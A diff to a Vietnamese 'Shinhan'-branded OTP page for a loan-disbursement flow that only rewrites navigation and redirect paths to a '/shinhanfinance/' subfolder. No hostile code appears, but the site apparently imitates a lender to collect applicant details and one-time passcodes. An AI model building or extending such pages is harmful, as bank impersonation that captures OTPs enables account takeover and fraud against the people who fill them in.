--- a/pages/vi/otp.html
+++ b/pages/vi/otp.html
@@ -80,13 +80,13 @@
         </div>
         <nav id="mobile-menu" class="md:hidden hidden bg-white border-t border-gray-200">
             <div class="px-2 pt-2 pb-3 space-y-1 sm:px-3">
-                 <a href="/pages/vi/trang-chu.html" class="text-gray-600 hover:bg-gray-50 hover:text-shinhan-blue block px-3 py-2 rounded-md text-base font-medium">Trang Chủ</a>
-                <a href="/pages/vi/gioi-thieu.html" class="text-gray-600 hover:bg-gray-50 hover:text-shinhan-blue block px-3 py-2 rounded-md text-base font-medium">Giới Thiệu</a>
-                <a href="/pages/vi/ca-nhan.html" class="text-gray-600 hover:bg-gray-50 hover:text-shinhan-blue block px-3 py-2 rounded-md text-base font-medium">Lợi Ích</a>
-                <a href="/pages/vi/Evaluate-conditions.html" class="text-gray-600 hover:bg-gray-50 hover:text-shinhan-blue block px-3 py-2 rounded-md text-base font-medium">Đăng Ký Giải Ngân</a>
-                 <a href="/pages/vi/step5.html" class="text-gray-600 hover:bg-gray-50 hover:text-shinhan-blue block px-3 py-2 rounded-md text-base font-medium">Xem Kết Quả</a>
-                 <a href="/pages/vi/dieu-khoan-su-dung.html" class="text-gray-600 hover:bg-gray-50 hover:text-shinhan-blue block px-3 py-2 rounded-md text-base font-medium">Điều Khoản Sử Dụng</a>
-                 <a href="/pages/vi/support-center.html" class="text-gray-600 hover:bg-gray-50 hover:text-shinhan-blue block px-3 py-2 rounded-md text-base font-medium">Liên Hệ</a>
+                 <a href="/shinhanfinance/pages/vi/trang-chu.html" class="text-gray-600 hover:bg-gray-50 hover:text-shinhan-blue block px-3 py-2 rounded-md text-base font-medium">Trang Chủ</a>
+                <a href="/shinhanfinance/pages/vi/gioi-thieu.html" class="text-gray-600 hover:bg-gray-50 hover:text-shinhan-blue block px-3 py-2 rounded-md text-base font-medium">Giới Thiệu</a>
+                <a href="/shinhanfinance/pages/vi/ca-nhan.html" class="text-gray-600 hover:bg-gray-50 hover:text-shinhan-blue block px-3 py-2 rounded-md text-base font-medium">Lợi Ích</a>
+                <a href="/shinhanfinance/pages/vi/Evaluate-conditions.html" class="text-gray-600 hover:bg-gray-50 hover:text-shinhan-blue block px-3 py-2 rounded-md text-base font-medium">Đăng Ký Giải Ngân</a>
+                 <a href="/shinhanfinance/pages/vi/step5.html" class="text-gray-600 hover:bg-gray-50 hover:text-shinhan-blue block px-3 py-2 rounded-md text-base font-medium">Xem Kết Quả</a>
+                 <a href="/shinhanfinance/pages/vi/dieu-khoan-su-dung.html" class="text-gray-600 hover:bg-gray-50 hover:text-shinhan-blue block px-3 py-2 rounded-md text-base font-medium">Điều Khoản Sử Dụng</a>
+                 <a href="/shinhanfinance/pages/vi/support-center.html" class="text-gray-600 hover:bg-gray-50 hover:text-shinhan-blue block px-3 py-2 rounded-md text-base font-medium">Liên Hệ</a>
             </div>
         </nav>
     </header>
@@ -316,7 +316,7 @@
                 errorMessageEl.textContent = 'Giải ngân không thành công. Vui lòng thử lại hoặc đăng ký giải ngân lại.';
                 errorButton.textContent = 'Đăng ký lại';
                 errorButton.onclick = () => {
-                    window.location.href = '/pages/vi/Evaluate-conditions.html';
+                    window.location.href = '/shinhanfinance/pages/vi/Evaluate-conditions.html';
                 };
                 modal.classList.remove('hidden');
             }
@@ -394,7 +394,7 @@ Hãy trình bày dưới dạng danh sách các gạch đầu dòng, sử dụng
             try {
                 formData = JSON.parse(sessionStorage.getItem('formData') || '{}');
                 if (!formData.fullName && !formData.accountHolder) {
-                    window.location.href = '/pages/vi/Evaluate-conditions.html';
+                    window.location.href = '/shinhanfinance/pages/vi/Evaluate-conditions.html';
                     return;
                 }
                 // *** FIX: Ưu tiên accountHolder, nếu không có thì dùng fullName ***
@@ -405,7 +405,7 @@ Hãy trình bày dưới dạng danh sách các gạch đầu dòng, sử dụng
                 document.getElementById('otpMessage').innerHTML = `Một mã OTP đã được gửi đến số điện thoại <strong>${formData.phone || 'N/A'}</strong>.`;
             } catch (error) {
                 console.error('Error parsing formData:', error);
-                window.location.href = '/pages/vi/Evaluate-conditions.html';
+                window.location.href = '/shinhanfinance/pages/vi/Evaluate-conditions.html';
             }
         });
     </script>
